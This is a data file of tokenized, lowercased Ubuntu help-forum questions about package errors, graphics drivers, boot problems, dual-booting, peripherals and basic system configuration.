518172	steam and unity 2d do n't get along	recently , unity 3d has been eating up too much resources for my computer . i switched to unity 2d , but steam no longer functions properly . i am greeted with this . as i progress , it gets worse . here 's another image . is there any way to fix this ? note : i have tried using the windows version using wine , but it runs too slowly to function properly . is there a way to fix this ? i believe it is a window-managing issue , but do n't know how to go about fixing it .
518174	how can i get rid of glitched boot screen in ubuntu 14.04 ?	i have a sony vaio vgn-fw550f w/ati radeon graphics . my problem is exactly like the one in question `` how can i get rid of a graphical glitch on ubuntu 12.10 '' , which is closed .
518177	architecture problems , what is armhf	by failing to install some i386 architecture packages , i assumed i was running on amd64 architecture but when i input sudo dpkg -- print-architecture the output is armhf . can someone explain what it means ? i was expecting amd64 as an output .
518178	package updater fails at unpacking libwebkitgtk-3.0-0 : i386 ( 2.4.3-1ubuntu2 ) over ( 1.8.3-0ubuntu0.12.04.1 )	recntly upgraded to 14.04 from 12.04 an receive a message : the package system is broken the output of a terminal session is shown below and appears to fail at : dpkg-deb ( subprocess ) : can not copy archive member from '/var/cache/apt/archives/libwebkitgtk-3.0-0_2.4.3-1ubuntu2_i386.deb ' to decompressor pipe : failed to read ( input/output error ) i 'm not able to resolve this issue by myself , and would greatly appreciate some guidance rgrimmer @ dell-e1405 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : apache2-mpm-worker fusioninventory-agent gir1.2-gst-plugins-base-0.10 gir1.2-gstreamer-0.10 gir1.2-indicate-0.7 gnome-games-data libapt-inst1.4 libbind9-80 libcdt4 libcelt0-0 libcmis-0.2-0 libcommon-sense-perl libcurl3-nss libdee-qt5-3 libdiscid0 libdns81 libexiv2-11 libfftw3-3 libfftw3-long3 libfile-which-perl libgdata1.9-cil libgexiv2-1 libglew1.6 libglewmx1.6 libgrail5 libgraph4 libgvc5 libisc83 libisccc80 libisccfg82 libjson-perl libjson-xs-perl libllvm3.0 liblwres80 libmagickcore4 libmagickcore4-extra libmagickwand4 libmusicbrainz3-6 libnet-cups-perl libnet-snmp-perl libnux-2.0-0 libnux-2.0-common libopenspc0 libparse-edid-perl libpathplan4 libpoppler19 libproc-daemon-perl libproc-pid-file-perl libproc-processtable-perl libraw5 librhythmbox-core5 libsocket-getaddrinfo-perl libtcl8.5 libtelepathy-farstream2 libtk8.5 libu1db-qt5-3 libuniversal-require-perl libx264-120 libxatracker1 libxml-treepp-perl linux-headers-3.2.0-52 linux-headers-3.2.0-52-generic linux-headers-3.2.0-65 linux-headers-3.2.0-65-generic python-mako python-markupsafe python-packagekit qtdeclarative5-friends0.2 qtdeclarative5-u1db1.0 qtdeclarative5-ubuntu-settings-components qtdeclarative5-ubuntu-settings-components-assets tcl8.5 tk8.5 unity-2d-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libwebkitgtk-3.0-0 the following packages will be upgraded : libwebkitgtk-3.0-0 1 upgraded , 0 newly installed , 0 to remove and 42 not upgraded . 11 not fully installed or removed . need to get 0 b/6,410 kb of archives . after this operation , 8,290 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 534539 files and directories currently installed . ) preparing to unpack ... /libwebkitgtk-3.0-0_2.4.3-1ubuntu2_i386.deb ... unpacking libwebkitgtk-3.0-0 : i386 ( 2.4.3-1ubuntu2 ) over ( 1.8.3-0ubuntu0.12.04.1 ) ... dpkg-deb ( subprocess ) : can not copy archive member from '/var/cache/apt/archives/libwebkitgtk-3.0-0_2.4.3-1ubuntu2_i386.deb ' to decompressor pipe : failed to read ( input/output error ) dpkg-deb ( subprocess ) : decompressing archive member : lzma error : unexpected end of input dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing archive /var/cache/apt/archives/libwebkitgtk-3.0-0_2.4.3-1ubuntu2_i386.deb ( -- unpack ) : can not copy extracted data for './usr/lib/i386-linux-gnu/libwebkitgtk-3.0.so.0.22.9 ' to '/usr/lib/i386-linux-gnu/libwebkitgtk-3.0.so.0.22.9.dpkg-new ' : unexpected end of file or stream errors were encountered while processing : /var/cache/apt/archives/libwebkitgtk-3.0-0_2.4.3-1ubuntu2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) rgrimmer @ dell-e1405 : ~ $
518181	how do i set up parental controls on tahr ?	keep in mind that this question is not asking for merely a time limiter ! please read the full question and see that i also want to limit application and internet access . the solution does n't have to be one single application , but it does have to be automatic enough that a technically illiterate person would n't have to fiddle with it . migrated to software recommendations as requested i 'm completely aghast at the lack of parental controls in tahr , and how even ubuntu.com 's suggestions are so out-of-date that some are impossible now . i need something that will : allow general computer time to be limited allow application access to be limited ( searching , installing , and running ) allow internet browsing time to be limited ( might also cover most of the above point ) allow sites to be blocked without manually maintaining a list allow specific sites to be whitelisted not set up or connect to a proxy or alternative dns , as we 're with comcast and they 're very keen to drop service at the slightest hint of alternative internet usage i ca n't use something like : timekpr , timoutd , or nanny , as they 're no longer available or supported opendns as i do n't know how comcast will treat that . even if they do n't mind at first , their actions going forward seem to show they wo n't be kind to it sometime soon . scrubit because our modem/router is rented from comcast .
518187	how to install dia plugins on ubuntu 12.04 ?	i am running ubuntu 12.04.5 lts ( precise ) . i already install and using dia . i need to use dia_orgchart.py downloaded from http : //dia-installer.de . as the instruction given , i try to put dia_orgchart.py to ~/.dia/python/ but seems i do n't have such directory . i have ~/.dia/ directory but there 's no python directory inside . i also try to put it on /usr/share/dia/python but i do n't know how to load the plugin inside of the application . how should i do that ?
518190	boot ubunto automatically	i have a hp laptop running windows 8.1 . it currently automatically boots up into windows 8.1 , so to load ubuntu i have to press the esc on startup key to go into boot options so i can access ubuntu . ideally i want to either run ubuntu by default ( preferred ) , or for a boot menu to appear on startup if the first option is n't possible . any ideas whether this is possible please ?
518191	why does ubuntu 14.04 trusty tahr use sheep as emblem ?	i have a very unimportant question : i am curious , why does ubuntu 14.04 use sheep as emblem ? why not an elephant or ant or another animal ?
518192	i ca n't install wine for some reason	i did sudo apt-get install wine it says that the package wine is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : pack 'wine ' has no installation candidate
518193	google chrome with buggy launcher	google chrome used to work for me , but today it started to act weirdly . when i open it ( on docky ) , it will create a new window instead of keeping on its own icon . to fix that , i ran sudo apt-get purge google-chrome stable and then re-installed it . but now it is worse . before , the new window had a title and a blurry icon , now it has no title and no icon . is there a way to fix it ? what should be done ?
518196	do n't know password , how do i set a new one ?	i have been using ubuntulkb 17 for almost half a year now , and recently , when attempting to download updates , am prompted for a password . i never set a password for ubuntu . i 've read similar threads on this sight telling me where to go via terminal to simply set a new one , but i ca n't do any of this without entering the current password , which i do n't know . help ? thanks .
518200	installing logitech quick cam driver qc-usb 0.6.6 ubuntu 14.04.1 lts	i am having issues trying to install this driver . i have extracted the tar.gz to it 's own folder but am unable to install the driver .
518201	installation error	i am new to linux . i installed ubuntu14.04 a few days back . whenever i installed any program in ubuntu software center.it shows me a message as package operation failed : the installation or removal of a software package failed . what does it mean ? it means software did n't install properly ? the error shown in the details part is shown below : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package libsqlite0 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 205852 files and directories currently installed . ) preparing to unpack ... /libsqlite0_2.8.17-10ubuntu2_amd64.deb ... unpacking libsqlite0 ( 2.8.17-10ubuntu2 ) ... selecting previously unselected package python-sqlite . preparing to unpack ... /python-sqlite_1.0.1-11_amd64.deb ... unpacking python-sqlite ( 1.0.1-11 ) ... selecting previously unselected package python-kaa-base . preparing to unpack ... /python-kaa-base_0.6.0+svn4596-1_amd64.deb ... unpacking python-kaa-base ( 0.6.0+svn4596-1 ) ... selecting previously unselected package python-kaa-metadata . preparing to unpack ... /python-kaa-metadata_0.7.7+svn4596-4_amd64.deb ... unpacking python-kaa-metadata ( 0.7.7+svn4596-4 ) ... selecting previously unselected package python-support . preparing to unpack ... /python-support_1.0.15_all.deb ... unpacking python-support ( 1.0.15 ) ... selecting previously unselected package subdownloader . preparing to unpack ... /subdownloader_2.0.14-1.1_all.deb ... unpacking subdownloader ( 2.0.14-1.1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... setting up hspa-modem-dkms ( 1.02.35 ) ... removing old hspa-modem-1.02.35 dkms files ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.02.35 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new hspa-modem-1.02.35 dkms files ... first installation : checking all kernels ... building only for 3.13.0-34-generic building for architecture x86_64 building initial module for 3.13.0-34-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . skipped . removing old hspa-modem-1.02.35 dkms files ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.02.35 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new hspa-modem-1.02.35 dkms files ... first installation : checking all kernels ... building only for 3.13.0-34-generic building for architecture x86_64 building initial module for 3.13.0-34-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . dpkg : error processing package hspa-modem-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 9 setting up libsqlite0 ( 2.8.17-10ubuntu2 ) ... setting up python-sqlite ( 1.0.1-11 ) ... setting up python-kaa-base ( 0.6.0+svn4596-1 ) ... setting up python-kaa-metadata ( 0.7.7+svn4596-4 ) ... setting up python-support ( 1.0.15 ) ... setting up subdownloader ( 2.0.14-1.1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6.1 ) ... processing triggers for python-support ( 1.0.15 ) ... error in function : setting up hspa-modem-dkms ( 1.02.35 ) ... removing old hspa-modem-1.02.35 dkms files ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.02.35 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new hspa-modem-1.02.35 dkms files ... first installation : checking all kernels ... building only for 3.13.0-34-generic building for architecture x86_64 building initial module for 3.13.0-34-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . skipped . removing old hspa-modem-1.02.35 dkms files ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 1.02.35 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new hspa-modem-1.02.35 dkms files ... first installation : checking all kernels ... building only for 3.13.0-34-generic building for architecture x86_64 building initial module for 3.13.0-34-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . dpkg : error processing package hspa-modem-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 9 please can anyone tell me what is this ? is this any problem or nothing ?
518202	very slow internet speed due to proxy	i have just installed ubuntu and i am totally a noob . my proxy was 172.31.1.4:8080 and i added these settings to run the internet mozilla get the normal speed but when i try to download anything from the software center i get only 17 kb/s ... .i had to wait 80 minutes to install gnome kindly help i am using a wired connection
518207	could not uninstall a package	i am using ubuntu14.04 . i downloaded a `` iso master '' software as a `` iso-master-1-3-8-es-en-br-fr-de-it-cn-ar-ru-ubu.deb '' file and i installed it via terminal . now , my problem is i am unable to remove this package.i tried to remove this package via both ubuntu software center and synaptic package manager.both of these did n't show me the option `` remove '' . it shows only a `` install '' option.but , iso master is already installed in my system and it also available in dash board.then , why i ca n't see a remove option.then i also tried to remove it via terminal . it shows me a following errors . running sudo apt-get remove isomaster reading package lists ... done building dependency tree reading state information ... done package 'isomaster ' is not installed , so not removed . did you mean 'isomaster : i386 ' ? the following packages were automatically installed and are no longer required : chromium-codecs-ffmpeg-extra libatk-bridge2.0-0 : i386 libatspi2.0-0 : i386 libcairo-gobject2 : i386 libcolord1 : i386 libdbusmenu-gtk3-4 : i386 libgtk-3-0 : i386 libnss3-1d : i386 libphonon4 libwayland-client0 : i386 libwayland-cursor0 : i386 libxkbcommon0 : i386 linux-headers-generic linux-image-generic phonon phonon-backend-gstreamer phonon-backend-gstreamer-common phonon-backend-gstreamer1.0 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 10 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up hspa-modem-dkms ( 1.02.35 ) ... removing old hspa-modem-1.02.35 dkms files ... deleting module version : 1.02.35 completely from the dkms tree . done . loading new hspa-modem-1.02.35 dkms files ... first installation : checking all kernels ... building only for 3.13.0-34-generic building for architecture x86_64 building initial module for 3.13.0-34-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . skipped . removing old hspa-modem-1.02.35 dkms files ... deleting module version : 1.02.35 completely from the dkms tree . done . loading new hspa-modem-1.02.35 dkms files ... first installation : checking all kernels ... building only for 3.13.0-34-generic building for architecture x86_64 building initial module for 3.13.0-34-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . dpkg : error processing package hspa-modem-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 9 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) running sudo apt-get remove iso master reading package lists ... done building dependency tree reading state information ... done e : unable to locate package iso e : unable to locate package master please can anyone tell me what is the problem and how to remove that software from my system .
518209	help fdisk 4 ( near ) identical 1tb drives	i have 4 drives to setup a raid 5 , but apparently they are not identical . i am not sure what steps to take next . it seems that i have ( 3 ) 512 and ( 1 ) 4096 sized drives . what should i do to format , and not impact performance ? ( before mdadm ) fdisk -l shows : disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf324ba09 device boot start end blocks id system /dev/sdb1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x38bcc1f0 device boot start end blocks id system /dev/sdc1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 81 heads , 63 sectors/track , 382818 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x570f77e7 device boot start end blocks id system /dev/sdd1 2048 1953525167 976761560 fd linux raid autodetect disk /dev/sde : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xeb665e7b device boot start end blocks id system
518210	ubuntu phone installation on locked phone	can i install ubuntu on carrier locked phone .. ? can i unlock it after installing ubuntu on my mobile phone .. ?
518217	change back to embedded graphics from terminal	i used the amd `` catalyst '' program ( from within unity ) to change to my dedicated graphics card , but now when i try to boot into ubuntu , i get an error that the graphics driver has failed ! following this , i am given various options , one of which is to boot into a `` safe-graphics '' mode , though this is actually not of use because unity does not load ( only the desktop does ) and i can not access terminal once the window system loads ( well , partially loads ) , even via the control+alt+t command . i can however , use one of the options after ubuntu whinges ( see above ) to boot to the old prompt-based setup ( i.e . without a window manager loaded ) which as i understand it , should allow me to enter terminal commands directly , just as if i had loaded unity and opened terminal ... so in saying this , what command would i use to switch back to my embedded ( intel ) graphics ?
518219	openssh : hacked before set up ?	today i tried setting up openssh on my computer with the hope of being able to connect to it from a different computer at work . this was my first time attempting to use open-ssh . i did the following steps : sudo apt-get install openssh-server modified /etc/ssh/sshd_config changed port from 22 to a number above 2000 changed permitrootlogin to no changed passwordauthentication to no did /etc/init.d/ssh restart i basically tried to follow all of the security rules that were established in online documentation . i then fooled around a bit trying to set up port forwarding on the router . i assumed that since i had not generated any keys or set up any passwords explicitly , nobody could access the server that i suppose was actually running . my question , basically , is that i 've now become concerned by a few factors : my internet seems slower , and i 've had a few applications crash unexpectedly . it seems like all of a sudden my computer has become less dependable and my automatic thought has been to check my assumption that an open-ssh server is not accessible if its keys have not been generated and no password has been set . my question then , is what is the state of the open-ssh server when it is restarted for the first time ? is there any way that it can be accessed by malicious people on the outside ? since i did n't get to the point of setting passwords or certificates up ( because i got scared ) , at what point does the open-ssh server become a liabilty ( i.e . hackable ) ? i sort of ca n't imagine that the server is instantly accessible with some sort of default password : that would be very easy to take advantage of , right ? at the same time , though , i 'm worried because this is all very new to me . some things i see in /var/log/auth.log that worried me : messages from polkitd ( authority=local ) saying something about an unregistered authentication agent repeated attempts to access /lib/security/pam_kwallet.so message that /tmp/.x11-unix/x0 has been linked to /run/user/112/x11-display ( who is user 112 ? ) i have looked each of these up and it seems they can be explained away but at the same time , a computer without this attempt at setting up openssh has decidely fewer weird messages like this . hoping someone can comfort me .
518220	nivida drivers install help	hell i 've been trying to install nivida drivers forever now and i keep running into this error . setting up nvidia-prime ( 0.6.2 ) ... nvidia-prime start/running , process 4736 setting up screen-resolution-extra ( 0.17.1 ) ... setting up nvidia-settings ( 343.13-0ubuntu1~xedgers14.04.1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6.3 ) ... processing triggers for ureadahead ( 0.100.0-16 ) ... processing triggers for initramfs-tools ( 0.103ubuntu4.2 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-35-generic errors were encountered while processing : nvidia-331 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i restart my display is messed up . my second monitor is blank and my main is running a very low resolution . in the display options it 's only one monitor .
518221	reinstalled os x , refind does n't boot anymore and goes straight to os x	i was having an issue where i could connect to ethernet on my macbook over ubuntu but not os x , and after trying a variety of different things decided to just reinstall os x . after doing that , the refind screen does n't show up and just goes straight to os x . this is what 's in my partition inspector : current gpt partition table : # start lba end lba type 1 40 409639 efi system ( fat ) 2 409640 389765095 mac os x hfs+ 3 389765096 391034639 mac os x boot 4 391034640 392304175 mac os x hfs+ 5 392304640 456867839 basic data 6 456867840 490233855 linux swap
518222	ubuntu ( 14.04 ) small screen on vmware ( 4.2.12 )	i am getting small screen of ubuntu after installation on vmware . i have tried installation twice . on trying to install guest addition it gives error - '' the headers of current running kernel were not found '' on checking with xrandr it gives only 640x480 as output xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected primary 640x480+0+0 0mm x 0mm 640x480 73.0* i have also increased video memory in vm to 40 mb
518230	can not install airtime	i tried to install airtime 2.5.1 on ubuntu 13.04 and on ububtu 14.04 and both times i got this message in terminal : setting up airtime ( 2.5.1-3 ) ... setting up apache2 ... site airtime-vhost already disabled apache 2.4 detected , using newer access configuration ... sed : ca n't read /etc/airtime/apache24.vhost.tpl : no such file or directory dpkg : error processing package airtime ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : airtime e : sub-process /usr/bin/dpkg returned an error code ( 1 ) do you have any idea about such an error , i 've been trying to fix it for weeks but unfortunately i could n't !
518231	disable laptop lid sleep	xubuntu 14.04 . i 've already done the following : handlelidswitch=ignore lidswitchignoreinhibited=no xset -dpms disabled xfce power manager in session and start up set power settings to do nothing when the lid is closed i 've not yet disabled acpi in grub but that 's my next step i guess . this problem just occurred after running updates . i do not want this laptop to sleep when the lid is dropped since it 's for playing music via pithos and has media buttons on the outside so i can control it with the lid down . i had tlp installed , i 've uninstalled it . if disabling acpi in grub does n't stop this then i 'll have to take the magnet out of the lid that tells the hardware the lid is down . this is very very frustrating .
518233	how to install micromax 355g usb wireless modem in ubuntu 14.04	how do i install a micromax mmx 355g data card usb modem ? i tried lsusb and sudo wvdialconf /etc/wvdial.conf , but neither of these commands detected my usb modem . i am using ubuntu 14.04 . i 'm newbie to ubuntu please help krish @ krish-inspiron-5521 : ~ $ sudo wvdialconf /etc/wvdial.conf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 modem port scan < *1 > : s8 s9 s10 s11 s12 s13 s14 s15 modem port scan < *1 > : s16 s17 s18 s19 s20 s21 s22 s23 modem port scan < *1 > : s24 s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? how i would proceed . please help this newbie i do n't want to switch windows again for this silly problem .
518235	xsane detects scanner but freezes when scanning	i am running xsane 0.998 on ubuntu 14.04 . when i start xsane , it correctly identifies my usb scanner as a canon pixma mp540 - but when i click the scan button - xsane freezes . however scanimage > image.pnm and simple scan both work fine $ scanimage -l device `pixma:04a91730_114002 ' is a canon canon pixma mp540 multi-function peripheral $ lsusb ... bus 001 device 012 : id 04a9:1730 canon , inc. ... $ sudo sane-find-scanner ... # no usb scanners found . ... any clues ?
518237	installed ubuntu 14.04.1 on a laptop with no os and the bootable usb wo n't load wubi	i 've installed the latest ubuntu onto a usb drive with plenty of storage . when i boot my laptop with no os on it , it does not detect my usb drive with ubuntu . i do n't know if it 's my bios , or if its just that ubuntu needs an operating system to run and install . and i can not reinstall windows 8 because of it not being able to locate a partition .
518238	dual-boot ( general boot ) messed up ! ca n't enter windows 8.1 ( bcd error )	i 'm kind of freaked out right now , but i will try to explain what happened as good as i can . english is not my first language , so please excuse any grammar or writing errors i 'm asking here on askubuntu because i did n't really know where else to go . the thing is that i was dual-booting windows 8.1 and ubuntu 14 for quite a while , and i came up to elementary os ( wich is a themed ubuntu 12.xx version if i 'm not wrong ) so i wanted to give it a try . i downloaded the .iso and made a live usb , from wich i could install the os , i formated the partition where ubuntu was installed so i could install elementary on that partition , it installed successfuly but when i restarted the pc , the grub wo n't show up , leading it to boot directly on elementary without even asking . so i tried to run the repair-boot tool and after i did it , when i restarted again , none of the os 's load , there was just a crappy command prompt of grub 1.99 saying something like `` press tab to see commands '' . so at that point i could n't start on any os ... i plugged the live usb and then reinstalled elementary , and after that , when i started the pc elementary load up directly without asking nor loading grub . tried the boot repair again , and same thing happened . i reinstalled elementary once again . then downloaded something called super grub2 disk , wich i burned and then tried to start from the super grub2 disk . -it started showing some kind of grub , where i could choose `` everything '' and load the operative systems installed , i choose the windows 8 efi boot loader and when i entered , it says that efi is not found and something related with /bcd ... i am not an engineer , so as you can imagine , i do n't really know what to do . i had tried some stuff like booting with a windows 8 live usb but it does now boot on the windows wizard , it boots on the crappy grub command prompt , and i ca n't enter any of the os . i am able to enter elementary ( in wich i am writing this right now ) but only if i enter through the super grub2 disk disk ... here is the link of the boot repair tool http : //paste2.org/ckfuvxvh please help : ( thank you very much ! ! ! if there is something i should post , please let me know . -bryan h .
518239	vnc plugin not working in remmina	remmina 0.9.99.1 , ubuntu 14.04 . i installed remmina from the repository . also installed both the rdp and the vnc plugins from the repository . i have verified that remmina-plugin-vnc.so is in /usr/lib/remmina/plugins/ when i start remmina , i see only the plugins for rdp , nothing for vnc . connecting to a remote host using rdp works just fine . of course , if i try to connect to a remote host that requires the vnc protocol , i can not , remmina wo n't work in that case . i 've tried all kinds of solutions , but nothing 's worked so far . i 've tried complete removal and reinstallation , restarting remmina , restarting the computer , etc . ( i originally asked this question on the `` issues '' github page for remmina , but they closed the question and told me that they would n't address it , that i had to ask it here . ) please help me with this problem . thanks .
518240	softether vpn access list not working	i installed softether as vpn server on ubuntu 12.4. now i add anonymous user for special range of ips . as you see blow i created a user named 'all ' : and i created an access list to deny access from range of ips : now access list not working and users can connect from all ips .
518241	mount : unknown filesystem type 'lvm2_member '	i am having mysql in /home and /home partition automatically unmounts at reboot . if i try to mount , it mounts but shows unknown filesystem . if i mount it forcefully by providing filesystem , it mounts with filesystem also but i can not see /home contents although size of /home is showing 4 gb . if i runs fsck in recovery mode it shows this error : mount : unknown filesystem type 'lvm2_member ' or file system busy or mounted .
518244	cq60-210tu wifi light blinking	the wifi is working perfectly fine but the wifi light is constantly blinking red then blue . red meaning that it 's off and blue meaning its on . this is very annoying and i was wondering if there is a fix . i am using the atheros chip in the cq60-210tu . the chip is a ar242x / ar542x wireless network adapter ( pci-express ) thanks , sam
518245	no print option is available with document viewer !	i am using ubuntu 14.0.1 on my dell vostro 1015 . as stated in title i have an inactive print option that i ca n't click . how to enable it again ? thanks in advance for any help .
518247	i ca n't make calls on skype	i am using ubuntu 14.04 lts . now i am unable to make calls on skype . every time it shows call failed . how can i rectify the error ?
518250	save sticky notes 3.5.92 on ubuntu 14.04	i remember when i used gnome sticky notes in ubuntu older version -- it used to retain notes states whenever restarted the system . i have upgraded os to ubuntu version 14.04 and default sticky notes version which i found is 3.5.92 . whenever i restart the system it does n't save the notes . is there any location where it saves all old notes ? or it just wipes out old notes ?
518251	how to add a custom openshot blender template ?	after creating the appropriate files and structure as listed ./blender/custom.xml ./blender/blend/custom.blend ./blender/scripts/custom.py ./blender/icons/custom.png and placed in the location /usr/share/pyshared/openshot/blender no option is available in openshot to use the custom template . how to do you add it to the openshot gui ?
518253	multiple montior issues , xinerama ruined everything	i am new to linux/ubuntu , and i am having issues with getting my displays to work . my setup works perfectly fine on windows . but i am having trouble getting it to work on ubuntu . i have 5 monitors , and 2 video cards . graphics cards : nvidia gtx 760 ( main ) nvidia 560 ti monitors from left to right : samsung s27b350 , connected to the secondary video card . samsung s24d590l connected to the primary video card . samsung un32eh5300f connected to the primary video card . samsung s24d590l connected to the primary video card . samsung s27b350 connected to the secondary video card . all connections are via dvi ports , converted to hdmi , ran with hdmi cables . here is how things went . i installed ubuntu . all 3 monitors on the primary video card were all mirrored . i installed all of my software , and used the drivers ubuntu automatically installed . i hit the start button , and typed in display i opened the nvidia x server settings panel . i went into the second down tab , configured the monitors on the primary video card , applied , saved , rebooted . after rebooting , i went to configure the monitors on the secondary card . by default , they were disabled . i enabled them , applied , saved , rebooted . after rebooting , the monitors were connected , however , i could not drag programs to the monitors on the monitors on the secondary graphics card . the cursor would go onto the screens , but the cursor was a white x. i read up on how i could fix this , and one of the threads on askubuntu said to enable xinerama . i did so , applied , saved , rebooted . after rebooting , the os loaded , and i had it set to auto-login , which it did . when it got to the point where it would normally show the desktop , all of the screens went dark ( not disconnected , just dark ) . after waiting 5 minutes or so , i figured something was not right , so i attempted to open the terminal ( ctrl+alt+f1 ) , which opened up , where i logged in , and was at the `` command prompt '' . i read up on how to disable xinerama through the terminal , and pages suggested going into xorg.conf , and editing it so that xinerama was set to 0 ( it was at 1 when i first opened the file ) . i attempted that , saved , rebooted , nothing changed . i then tried typing into the console sudo service lightdm stop as a thread suggested , the thread said after that , type in sudo service lightdm start , however , after i typed the first command , everything went black , and after attempting to type in the second command , my typing was not showing up , and after typing the command anyway , nothing happened . i rebooted , and looked for other results . additionally , i attempted running sudo dpkg-reconfigure xserver-xorg which did nothing ( which i later find is depreciated ) . i guess what i am getting at is x server is not working ... i need this to work , so that i can finally get away from windows hate ... i mean , windows 8 . thank you guys for all of your time ! what i have used for help : how to reset the xorg / xserver ? how can i disable xinerama ?
518254	ubutu 14.04 menubar issue	i choose option show the menus in the window 's title bar . it works probably if i run an app in normal way , mean click on icon to open . but when i open it in terminal with root permission , the menu bar is no longer in title bar , it 's in `` a new part '' ( i think so ) under the title bar . how can i fix it ? ? ? gedit and more are the same .
518258	how to install windows programs in ubuntu 14.0.1	i have recently switched from windows to ubuntu 14.0.1 . since i am a beginner , i have not much idea regarding ubuntu . i want to install some programs that i use in windows . i have the set ups but i am unable to install them in ubuntu . please help .
518259	understanding chmod symbolic notation and use of octal	many new users make mistakes ( or have misunderstanding ) while applying chmod on files or directories , because of a lack of informative knowledge of : symbolic notation for ugo and rwx use of octal numbers so , in this answer i have provided some useful information that can help to understand correct symbolic notation and using octal numbers .
